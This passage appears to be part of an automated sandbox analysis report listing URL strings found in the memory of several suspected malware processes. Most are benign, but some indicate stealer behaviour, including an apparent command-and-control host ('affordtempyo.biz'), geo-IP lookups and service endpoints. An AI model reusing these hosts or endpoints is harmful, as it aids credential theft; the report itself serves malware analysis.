Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854877130.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp, ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.000000000530F000.00000004.00000800.00020000.00000000.sdmp, ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.000000000530F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: svchost.exe, 0000000C.00000003.2788068435.000002707DECE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://w3.org/2001/10/xml-exc-c14n#
Source: rnHV2EM9rK6P.tmp, 00000022.00000002.3410873848.0000000005E3B000.00000004.00001000.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000003.3301838740.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, filebasedassist.exe, 00000024.00000000.3300737787.0000000000732000.00000002.00000001.01000000.0000001C.sdmp	String found in binary or memory: http://www.bcgsoft.com
Source: rnHV2EM9rK6P.exe, 00000021.00000003.3254538360.0000000002320000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.exe, 00000021.00000003.3255043364.0000000002098000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.tmp, 00000022.00000000.3256711100.0000000000401000.00000020.00000001.01000000.00000019.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: rnHV2EM9rK6P.exe, 00000021.00000000.3253061031.0000000000401000.00000020.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: rnHV2EM9rK6P.exe, 00000021.00000000.3253061031.0000000000401000.00000020.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: lt8kslFxQ.exe, 00000025.00000000.3298754054.0000000000071000.00000020.00000001.01000000.0000001D.sdmp, lt8kslFxQ.exe.29.dr	String found in binary or memory: http://www.picget.net
Source: lt8kslFxQ.exe, 00000025.00000000.3298754054.0000000000071000.00000020.00000001.01000000.0000001D.sdmp, lt8kslFxQ.exe.29.dr	String found in binary or memory: http://www.picget.net/photoshine-photo-editor/buy.html
Source: lt8kslFxQ.exe.29.dr	String found in binary or memory: http://www.picget.net/photoshine-photo-editor/buy.htmlIEXPLORE.EXEopenU
Source: lt8kslFxQ.exe, 00000025.00000000.3298754054.0000000000071000.00000020.00000001.01000000.0000001D.sdmp, lt8kslFxQ.exe.29.dr	String found in binary or memory: http://www.picget.netIEXPLORE.EXEopenU
Source: rnHV2EM9rK6P.exe, 00000021.00000003.3254538360.0000000002320000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.exe, 00000021.00000003.3255043364.0000000002098000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.tmp, 00000022.00000000.3256711100.0000000000401000.00000020.00000001.01000000.00000019.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: rnHV2EM9rK6P.exe, 00000021.00000003.3254538360.0000000002320000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.exe, 00000021.00000003.3255043364.0000000002098000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.tmp, 00000022.00000000.3256711100.0000000000401000.00000020.00000001.01000000.00000019.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: svchost.exe, 0000000C.00000002.3413197005.000002707DE11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2779046523.000002707DE0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: svchost.exe, 0000000C.00000002.3413197005.000002707DE11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2779046523.000002707DE0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600e
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601p
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000C.00000003.2609987541.000002707D957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwame
Source: BitLockerToGo.exe, 0000001A.00000002.3119480347.0000000000773000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000773000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://affordtempyo.biz:443/apid
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: ViGgA8C.exe, 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, ViGgA8C.exe, 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: ViGgA8C.exe, 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, ViGgA8C.exe, 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: cbf2b6294a.exe, 00000019.00000003.3029634128.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3172342088.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: KbSwZup.exe, 0000001C.00000003.3172342088.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steam
Source: BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=aiN5PFKWybrq&a
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854877130.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
